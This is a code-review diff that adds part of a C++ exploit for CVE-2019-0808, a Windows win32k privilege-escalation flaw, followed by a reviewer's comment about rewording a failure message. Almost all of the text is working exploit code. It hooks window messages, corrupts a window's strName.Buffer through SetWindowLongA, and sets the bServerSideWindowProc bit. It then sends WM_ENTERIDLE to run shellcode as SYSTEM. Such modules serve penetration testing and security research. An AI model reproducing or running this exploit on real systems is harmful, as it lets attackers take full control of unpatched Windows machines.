external/source/exploits/CVE-2019-0808/NtUserMNDragOverExploit/dllmain.cpp

```diff
@@ -0,0 +1,686 @@
+		*/
+		memset((void *)0x50, 0xF0, 0x1000);
+
+		return (ULONG)hWndFakeMenu;
+	}
+	return DefWindowProc(hwnd, msg, wParam, lParam);
+}
+
+LRESULT CALLBACK WindowHookProc(INT code, WPARAM wParam, LPARAM lParam)
+{
+	tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam;
+
+	// If the drag and drop operation hasn't started yet, then just call the next hook if there is one.
+	if (!bOnDraging) {
+		return CallNextHookEx(0, code, wParam, lParam);
+	}
+
+	// If the incoming message was a WM_MN_FINDMENUWINDOWFROMPOINT message, then set bIsDefWndProc to FALSE
+	// to indicate hWndMain's window procedure is no longer DefWindowProc(), and set hWndMain's window
+	// procedure to SubMenuProc().
+	if ((cwp->message == WM_MN_FINDMENUWINDOWFROMPOINT))
+	{
+		bIsDefWndProc = FALSE;
+		dprintf("[*] HWND: %p \n", cwp->hwnd);
+		SetWindowLongPtr(cwp->hwnd, GWLP_WNDPROC, (ULONG64)SubMenuProc);
+	}
+	else {
+		if ((cwp->message == 0x1E5)) {
+			UINT offset = 0; // Create the offset variable which will hold the offset from the start of
+							// hPrimaryWindow's cbwnd data field to write to.
+
+			UINT addressOfStartofPrimaryWndCbWndData = (primaryWindowAddress + 0xB0); // Set addressOfStartofPrimaryWndCbWndData to the address of
+																					  // the start of hPrimaryWindow's cbwnd data field.
+
+			// Set offset to the difference between hSecondaryWindow's
+			// strName.Buffer's memory address and the address of
+			// hPrimaryWindow's cbwnd data field.
+			offset = ((secondaryWindowAddress + 0x8C) - addressOfStartofPrimaryWndCbWndData);
+			dprintf("[*] Offset: 0x%08X\r\n", offset);
+
+			// Set the strName.Buffer address in hSecondaryWindow to (secondaryWindowAddress + 0x16), or the address of the bServerSideWindowProc bit.
+			if (SetWindowLongA(hPrimaryWindow, offset, (secondaryWindowAddress + 0x16)) == 0) {
+				dprintf("[!] SetWindowLongA malicious error: 0x%08X\r\n", GetLastError());
+				ExitProcess(-1);
+			}
+			else {
+				dprintf("[*] SetWindowLongA called to set strName.Buffer address. Current strName.Buffer address that is being adjusted: 0x%08X\r\n", (addressOfStartofPrimaryWndCbWndData + offset));
+			}
+
+			// Write the value \x06 to it to set the bServerSideWindowProc bit in hSecondaryWindow.
+			if (SetWindowTextA(hSecondaryWindow, "\x06") == 0) {
+				dprintf("[!] SetWindowTextA couldn't set the bServerSideWindowProc bit. Error was: 0x%08X\r\n", GetLastError());
+				ExitProcess(-1);
+			}
+			else {
+				dprintf("Successfully set the bServerSideWindowProc bit at: 0x%08X\r\n", (secondaryWindowAddress + 0x16));
+				dprintf("Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM.\r\n");
+				SendMessageA(hSecondaryWindow, WM_ENTERIDLE, NULL, NULL);
+				if (success == TRUE) {
+					dprintf("[*] Successfully exploited CVE-2019-0808 and triggered the shellcode!\r\n");
+				}
+				else {
+					dprintf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n");

```

Comment:
Should change this to `[!] Exploit failed, we did not elevate our privileges for some reason!`